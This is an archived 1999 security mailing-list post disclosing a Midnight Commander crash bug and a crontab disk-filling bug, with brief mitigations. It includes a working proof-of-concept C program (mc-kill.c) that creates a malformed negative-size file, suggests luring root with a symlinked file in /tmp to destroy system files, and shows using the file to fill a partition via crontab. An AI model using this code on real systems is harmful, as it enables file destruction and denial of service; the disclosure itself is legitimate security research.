Large size file and Midnight/bug in crontab with this file

From: Maurycy Prodeus (z33dat_private)
Date: Wed Apr 14 1999 - 23:16:08 PDT

Next message: 0x1c: "FSA-99.04-IPFILTER-v3.2.10"

Previous message: Frank Tegtmeyer: "Re: ARP problem in Windows9X/NT"
Next in thread: Mixter: "Re: Large size file and Midnight/bug in crontab with this file"
Reply: Mixter: "Re: Large size file and Midnight/bug in crontab with this file"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello ...
*******************************************************************************
*
* I.  -= Midnight small buf =-
*
* II. -= Large size file - you can fill disk too with crontab ( Michal
*   Zalewski found this )
*
*******************************************************************************

I.

This time I found another bug in Midnight Commander 4.xx [ i used 4.1.33 ;)] ...
We can make a Segmentation Fault and if root doesn't lock this , it causes
Core Dumping ... ofcourse we just make some file in /tmp (?) and if root
read this file ... his mc creates core... yeesss we can make symlink to
every file in system ... and this file will be total destroy !
Together with "Social Engeering",it is dangerous . [ filename may be example :
hacker.tools or sth. ]
What file we must create ?
With negative size , but really it is a very large size ;-) ( very strange
 that even in kernel 2.2.5 it is posible )

Quick test : Run this program and next run mc and try read [ F3 ofcourse
and example PageDown ]  file which was created by mc-kill ...

--------- mc-kill.c ------------

#include <sys/file.h>
#include <stdio.h>
#define size -900000

main(int argc,char* argv[]) {
  int i;
  if (!argv[1]) {
    printf("\nUSAGE : %s filename[and patch] \n\n",argv[0]);
    exit(0);
  }
  fchmod(i=open(argv[1],O_RDWR|O_CREAT,0600),0666);
  ftruncate(i,size);
  fsync(i);
}
------------ end of mc-kill.c ---------------

SOLUTION

You NEVER read strange file in MC ...:-)
hmmm seriously : lcamtuf [ http://dione.ids.pl ] wrote kernel module which
not allow to create symlinks in /tmp ...

II.

If you use above program ( or /dev/zero :-) ) you may fill partition ...
When crontab is reading file , creates temp in /var/spool/cron/ ( non-root
can't even read this - lcamtuf ) But , if it doesn't finish then doesn't
delete
this temp file ... OK. So , we must give crontab file with "infinit" size
.

Example : crontab -file-made-by-mc-kill


SOLUTION

It isn't very dangerous.




*******************************************************************************

z33d email : z33dat_private www : z33d.lighting.ml.org

Jesli nie istnieje racjonalna strategia optymalna , optymalna strategia
jest strategia losowa ...
                              - unknown -

Next message: 0x1c: "FSA-99.04-IPFILTER-v3.2.10"
Previous message: Frank Tegtmeyer: "Re: ARP problem in Windows9X/NT"
Next in thread: Mixter: "Re: Large size file and Midnight/bug in crontab with this file"
Reply: Mixter: "Re: Large size file and Midnight/bug in crontab with this file"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:42:35 PDT